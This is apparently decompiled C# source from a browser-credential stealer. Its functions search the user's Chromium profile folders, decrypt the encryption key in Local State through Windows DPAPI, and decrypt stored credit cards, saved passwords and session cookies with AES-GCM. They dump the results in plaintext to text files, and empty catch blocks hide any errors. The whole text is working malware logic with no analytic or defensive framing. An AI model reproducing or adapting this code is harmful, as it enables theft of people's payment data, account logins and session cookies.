// Token: 0x0600002B RID: 43 RVA: 0x000077D0 File Offset: 0x000059D0
public static void GetCards(string path2save)
{
try
{
List <string> list = new List <string>();
List <string> list2 = new List <string>();
list2.Add(Help.AppDate);
list2.Add(Help.LocalData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string text2 = "";
string[] array = null;
try
{
list.AddRange(Directory.GetFiles(text, "Web Data", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Web Data", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text3 in array)
{
try
{
if (File.Exists(text3))
{
string text4 = "Unknown";
foreach (string text5 in Chromium.BrowsersName)
{
if (text.Contains(text5))
{
text4 = text5;
}
}
string sourceFileName = text3;
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
File.Copy(sourceFileName, Chromium.bd);
SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
new List <PassData>();
sqlHandler.ReadTable("credit_cards");
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string @string = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(k, 4)), null));
string value = sqlHandler.GetValue(k, 1);
string value2 = sqlHandler.GetValue(k, 2);
string value3 = sqlHandler.GetValue(k, 3);
string value4 = sqlHandler.GetValue(k, 9);
text2 += string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", new object[]
{
value,
value2,
value3,
@string,
value4
});
Chromium.CC++;
}
catch
{
}
}
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
if (text4 == "Unknown")
{
File.AppendAllText(path2save + "\\Cards_" + text4 + ".txt", text2);
}
else
{
File.WriteAllText(path2save + "\\Cards_" + text4 + ".txt", text2);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
// Token: 0x06000028 RID: 40 RVA: 0x00006A28 File Offset: 0x00004C28
public static void GetPasswords(string path2save)
{
try
{
List <string> list = new List <string>();
List <string> list2 = new List <string>();
list2.Add(Help.AppDate);
list2.Add(Help.LocalData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string[] array = null;
string text2 = "";
try
{
list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text3 in array)
{
try
{
if (File.Exists(text3))
{
string text4 = "Unknown";
foreach (string text5 in Chromium.BrowsersName)
{
if (text.Contains(text5))
{
text4 = text5;
}
}
string sourceFileName = text3;
string sourceFileName2 = text3 + "\\..\\..\\Local State";
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
File.Copy(sourceFileName, Chromium.bd);
File.Copy(sourceFileName2, Chromium.ls);
SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
new List <PassData>();
sqlHandler.ReadTable("logins");
string text6 = File.ReadAllText(Chromium.ls);
string[] array4 = Regex.Split(text6, "\"");
int num = 0;
string[] array3 = array4;
for (int j = 0; j < array3.Length; j++)
{
if (array3[j] == "encrypted_key")
{
text6 = array4[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string value = sqlHandler.GetValue(k, 5);
byte[] bytes = Encoding.Default.GetBytes(value);
string str = "";
try
{
if (value.StartsWith("v10") || value.StartsWith("v11"))
{
byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
str = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
}
else
{
str = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
}
}
catch
{
}
text2 = text2 + "Url: " + sqlHandler.GetValue(k, 1) + "\r\n";
text2 = text2 + "Login: "******"\r\n";
text2 = text2 + "Passwords: " + str + "\r\n";
text2 = text2 + "Browser: " + text4 + "\r\n\r\n";
Chromium.Passwords++;
}
catch
{
}
}
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
if (text4 == "Unknown")
{
File.AppendAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
}
else
{
File.WriteAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
// Token: 0x0600002A RID: 42 RVA: 0x00007340 File Offset: 0x00005540
public static void GetCookies(string path2save)
{
try
{
List <string> list = new List <string>();
List <string> list2 = new List <string>();
list2.Add(Help.AppDate);
list2.Add(Help.LocalData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string text2 = "";
string[] array = null;
try
{
list.AddRange(Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text3 in array)
{
try
{
if (File.Exists(text3))
{
string text4 = "Unknown";
foreach (string text5 in Chromium.BrowsersName)
{
if (text.Contains(text5))
{
text4 = text5;
}
}
string sourceFileName = text3;
string sourceFileName2 = text3 + "\\..\\..\\Local State";
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
File.Copy(sourceFileName, Chromium.bd);
File.Copy(sourceFileName2, Chromium.ls);
SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
new List <PassData>();
sqlHandler.ReadTable("cookies");
string text6 = File.ReadAllText(Chromium.ls);
string[] array4 = Regex.Split(text6, "\"");
int num = 0;
string[] array3 = array4;
for (int j = 0; j < array3.Length; j++)
{
if (array3[j] == "encrypted_key")
{
text6 = array4[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string value = sqlHandler.GetValue(k, 12);
byte[] bytes = Encoding.Default.GetBytes(value);
try
{
string text7;
if (value.StartsWith("v10"))
{
byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
text7 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
}
else
{
text7 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
}
string value2 = sqlHandler.GetValue(k, 1);
string value3 = sqlHandler.GetValue(k, 2);
string value4 = sqlHandler.GetValue(k, 4);
string value5 = sqlHandler.GetValue(k, 5);
string value6 = sqlHandler.GetValue(k, 6);
text2 += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", new object[]
{
value2,
value4,
value6.ToUpper(),
value5,
value3,
text7
});
Chromium.Cookies++;
}
catch
{
}
}
catch
{
}
}
if (File.Exists(Chromium.bd))
{
File.Delete(Chromium.bd);
}
if (File.Exists(Chromium.ls))
{
File.Delete(Chromium.ls);
}
if (text4 == "Unknown")
{
File.AppendAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
}
else
{
File.WriteAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
// Token: 0x06000038 RID: 56 RVA: 0x00008580 File Offset: 0x00006780
public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
{
DecryptAPI.DataBlob dataBlob = default(DecryptAPI.DataBlob);
DecryptAPI.DataBlob dataBlob2 = default(DecryptAPI.DataBlob);
DecryptAPI.DataBlob dataBlob3 = default(DecryptAPI.DataBlob);
DecryptAPI.CryptprotectPromptstruct cryptprotectPromptstruct = new DecryptAPI.CryptprotectPromptstruct
{
cbSize = Marshal.SizeOf(typeof(DecryptAPI.CryptprotectPromptstruct)),
dwPromptFlags = 0,
hwndApp = IntPtr.Zero,
szPrompt = null
};
string empty = string.Empty;
try
{
try
{
if (cipherTextBytes == null)
{
cipherTextBytes = new byte[0];
}
dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
dataBlob2.cbData = cipherTextBytes.Length;
Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
}
catch
{
}
try
{
if (entropyBytes == null)
{
entropyBytes = new byte[0];
}
dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
dataBlob3.cbData = entropyBytes.Length;
Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
}
catch
{
}
DecryptAPI.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
byte[] array = new byte[dataBlob.cbData];
Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
return(array);
}
catch
{
}
finally
{
if (dataBlob.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob.pbData);
}
if (dataBlob2.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob2.pbData);
}
if (dataBlob3.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob3.pbData);
}
}
return(new byte[0]);
}
